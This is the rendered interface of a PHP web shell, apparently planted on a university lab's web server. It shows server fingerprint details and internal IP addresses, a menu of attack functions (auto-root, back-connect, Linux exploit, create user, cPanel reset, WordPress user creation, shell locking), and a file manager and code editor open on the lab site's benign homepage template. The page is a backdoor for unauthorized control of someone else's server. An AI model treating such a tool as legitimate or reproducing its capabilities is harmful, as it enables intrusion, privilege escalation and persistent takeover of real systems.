Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
myproject /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
Gallery.html
8.07
KB
-rw-r--r--
base.html
4.88
KB
-rw-r--r--
blogs.html
309
B
-rw-r--r--
contact.html
3.2
KB
-rw-r--r--
fullwidth.html
191
B
-rw-r--r--
index.html
7.19
KB
-rw-r--r--
index1.html
54.46
KB
-rw-r--r--
login.html
1.88
KB
-rw-r--r--
members.html
4.77
KB
-rw-r--r--
navbar.html
10.48
KB
-rw-r--r--
navbar.html-bk
7.15
KB
-rw-r--r--
register.html
1.65
KB
-rw-r--r--
sidebar_left.html
308
B
-rw-r--r--
sidebar_right.html
308
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Document</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" crossorigin="anonymous" referrerpolicy="no-referrer" /> <style> .slider-container { margin: auto; overflow: hidden; position: relative; } .slider { display: flex; transition: transform 0.5s ease; } .slide { min-width: 100%; max-width: 100%; } .slider-button { position: absolute; top: 50%; z-index: 10; background-color: rgba(0, 0, 0, 0.5); color: white; font-size: 24px; cursor: pointer; border: none; transform: translateY(-50%); } .slider-button-left { left: 10px; } .slider-button-right { right: 10px; } </style> </head> <body> <!-- {% include 'navbar.html' %} --> <div class="max-w-[1600px] mx-auto w-full"> {% comment %} <a href="{% url 'news_list' %}" class="hover:text-red-500">News</a> {% endcomment %} <div class="relative slider-container w-full h-[500px]"> <button class="slider-button slider-button-left px-2" onclick="moveSlide(-1)">❮</button> <div class="slider h-full"> <div class="slide h-full"> <img src="\static\assets\indoor copy.jpg" alt="Image 1" class="w-full h-full object-cover" /> </div> <div class="slide"> <img src="\static\assets\11.jpg" alt="Image 2" class="w-full h-full object-cover" /> </div> <div class="slide"> <img src="\static\assets\13.jpg" alt="Image 3" class="w-full h-full object-cover" /> </div> <div class="slide"> <img src="\static\assets\14.jpg" alt="Image 4" class="w-full h-full object-cover" /> </div> <div class="slide"> <img src="\static\assets\9.jpg" alt="Image 5" class="w-full h-full object-cover" /> </div> <div class="slide"> <img src="\static\assets\18.jpg" alt="Image 6" class="w-full h-full object-cover" /> </div> </div> <button class="slider-button slider-button-right px-2" onclick="moveSlide(1)">❯</button> </div> </div> <div class="max-w-[1300px] mx-auto px-5 py-5 grid grid-cols-1 gap-5 mt-10"> <div class="grid grif-cols-2 lg:grid-cols-3 "> <div class="lg:h-[250px] lg:aspect-[4/5]"> <img class="h-full w-full" src="\static\assets\Anuj_grover.JPG" /> </div> <div class="lg:col-span-2"> <h2 class="text-xl font-bold">Dr. Anuj Grover</h2> <p class="font-semibold">Associate Professor</p> <p>Department of Electronics and Communication Engineering Indraprastha Institute of Information Technology, Delhi (IIIT Delhi) Okhla Industrial Estate, Phase III, New Delhi - 110020</p> <p>Phone: 011 2690 7494</p> <p>Email: <a href="mailto:anuj@iiitd.ac.in" class="text-blue-500">anuj@iiitd.ac.in</a></p> <p>Web: <a href="https://bit.ly/anuj-grover" class="text-blue-500" target="_blank">https://bit.ly/anuj-grover</a></p> <p>YouTube: <a href="https://www.youtube.com/c/anujg1" class="text-blue-500" target="_blank">https://www.youtube.com/c/anujg1</a></p> </div> </div> <div class="flex justify-center h-full flex-col gap-5"> <h3 class="text-3xl font-bold">Welcome to the VICAS-LAB</h3> <p class="text-base"> Welcome to the VLSI Circuits and Systems (VICAS) Lab at IIIT Delhi, a pioneering research facility dedicated to advancing the frontiers of Ultra Low Power In-Memory Compute for edge computing and machine learning applications. Situated in A-613 of the R&D block, the VICAS Lab is at the forefront of innovation, focusing on critical areas such as safety and security in hardware, as well as error resilient and energy-efficient systems. Under the expert guidance of Dr. Anuj Grover, our lab is committed to developing cutting-edge technologies that meet the ever-growing demands of modern computational systems, ensuring both high performance and robust security. Join us as we explore groundbreaking solutions that are set to shape the future of computing. </p> </div> <div class="flex justify-center h-full flex-col gap-5"> <h3 class="text-3xl font-bold">Research Areas</h3> <ul> <li>In-Memory Computing</li> <li>Low power SRAM</li> <li>Analog EDA</li> <li>Ageing Circuits Analog EDA</li> <li>Sustainability for SemiConductor ICs</li> <li>Low Voltage SRAM</li> </ul> </div> </div> <footer class="bg-[#69b3ae] py-8 mt-10"> <div class="max-w-[1300px] mx-auto px-5 flex flex-col lg:flex-row items-center justify-between gap-5"> <div class="text-center lg:text-left"> <p class="text-sm text-white">© 2025 VICAS-LAB, IIIT-Delhi. All rights reserved.</p> </div> <div class="flex gap-4"> <a href="https://facebook.com" target="_blank" class="text-white hover:text-blue-600 text-xl"> <i class="fab fa-facebook-f"></i> </a> <a href="https://twitter.com" target="_blank" class="text-white hover:text-blue-400 text-xl"> <i class="fab fa-twitter"></i> </a> <a href="https://linkedin.com" target="_blank" class="text-white hover:text-blue-700 text-xl"> <i class="fab fa-linkedin-in"></i> </a> <a href="https://youtube.com" target="_blank" class="text-white hover:text-red-600 text-xl"> <i class="fab fa-youtube"></i> </a> </div> </div> </footer> <script> let slideIndex = 0; function moveSlide(step) { const slides = document.querySelectorAll('.slide'); slideIndex += step; if (slideIndex >= slides.length) { slideIndex = 0; } if (slideIndex < 0) { slideIndex = slides.length - 1; } const slider = document.querySelector('.slider'); const slideWidth = slides[0].offsetWidth; slider.style.transform = `translateX(-${slideWidth * slideIndex}px)`; } // Auto-slide every 3 seconds setInterval(() => { moveSlide(1); }, 3000); </script> <script src="https://unpkg.com/@tailwindcss/browser@4"></script> </body> </html>
Close